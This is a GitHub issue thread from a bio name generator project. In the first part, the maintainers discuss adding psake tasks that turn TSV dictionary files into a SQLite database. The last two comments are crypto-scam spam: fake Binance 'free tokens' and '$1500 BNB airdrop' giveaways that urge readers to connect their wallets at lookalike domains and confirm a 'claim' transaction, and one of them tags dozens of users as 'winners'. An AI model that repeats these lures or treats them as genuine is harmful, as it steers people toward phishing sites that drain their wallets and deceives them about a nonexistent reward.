### ISSUE TITLE
Create a psake task to generate the dictionaries

### ISSUE THREAD

**Issue by abhi18av** [Mxrcon/name_generator#2]
Hi @Mxrcon ,

I noticed that the https://github.com/Mxrcon/BioNameGenerator/blob/main/BioNameGenerator/Databases/Generate-Databases.ps1 is basically a small task to generate the sqlite database from the TSV files.

I was wondering whether it makes sense to 
- Add a task to download these TSV files into a folder: This way the sources would be self-documenting
- Add another task to generate the database

Nothing urgent, but something nice to have as it'll guide the collaborators.

**Comment by Mxrcon** [comment]
I completely agree Abhinav, I was worried about the TSV's outside the repository, I don't want to distribute the tsv's file within the package, but for development propose I can add the on the root folder of the repository and them create a psake task as you mentioned.

**Comment by Mxrcon** [comment]
Hey H@abhi18av, The tsv sources are actually modified from different web sources, and some of them had inconsistencies that I had to solve manually, like names with `u` instead of `ü`. and cleanups on some unnecessary compound names like Iron-II vs Iron-III. 

What do you think about adding TSV files on the root folder of this repository on this structure:

```
Dictionaries/
├── Generate-Databases.ps1
└── TsvDictionaries
    ├── 28kAdjectives.tsv
    ├── 5kColors.tsv
    ├── Aminoacids.tsv
    ├── Animals.tsv
    ├── BacterialGeneras.tsv
    ├── BacterialSpecies.tsv
    ├── BiologicalBooks.tsv
    ├── BrazilianScientists.tsv
    ├── ChemicalCompounds.tsv
    ├── Colors.tsv
    ├── ComputationKeywords.tsv
    ├── Dictionaries.db
    ├── FieldsWinners.tsv
    ├── LaboratoryKeywords.tsv
    ├── MetalsAndAlloys.tsv
    ├── NF-Adjectives.tsv
    ├── NF-Names.tsv
    ├── NobelLaureates.tsv
    ├── NucleicAcids.tsv
    ├── PeriodicTableElements.tsv
    └── RPGKeywords.tsv
```

And this Script would be called by the psake task in order to generate a database, and we would have 2 tasks:
1. Generate database (to use all TSVs and generate a sqlite database)
2. Update database (Generate a new database and update the `Bionamegenerator/Databases/Dictionaries.db`

Unfortunately I'm not sure that I'll be able to write a pwsh script able to completely reproduce the process on getting wikipedia pages and them formating them to the TSV's.

Kindly, Davi

**Comment by manoharkumarmahto** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @marceloverass, @muriloduart, @brunasuriano, @Vinicius-Lima-Melo, @gildsonlima, @Kvothezz, @flpenteado, @valeridev, @elnobre23, @Lotusxd, @RiosJoaoP, @mepossamai, @k8adev, @eron93br, @jamesson-dev, @eduabenathar, @thiagosouzalink, @bratao, @guilhermemoraes1, @JohnDev0000, @PedroAlbuquerque00, @tufcoder, @wilsonhipolito, @vini-ribeiro, @pedrogamedev, @estevaoam, @rogerioisj, @arthurconstante, @gasech, @becabelin, @beatrizmakowski, @NIcolasiuri, @denilson-pinto, @NVPanda, @bryansantosdeve, @enzosarmento, @PedroMiguel7, @samfelgar, @Luisaboia, @Quenom117, @lleonardogr, @lucasgedos, @costamatheus97, @vinisioux, @feegioppato, @Falconiere, @Joanna8899, @lissanecremildo, @ammachado, @JSilver-Legend
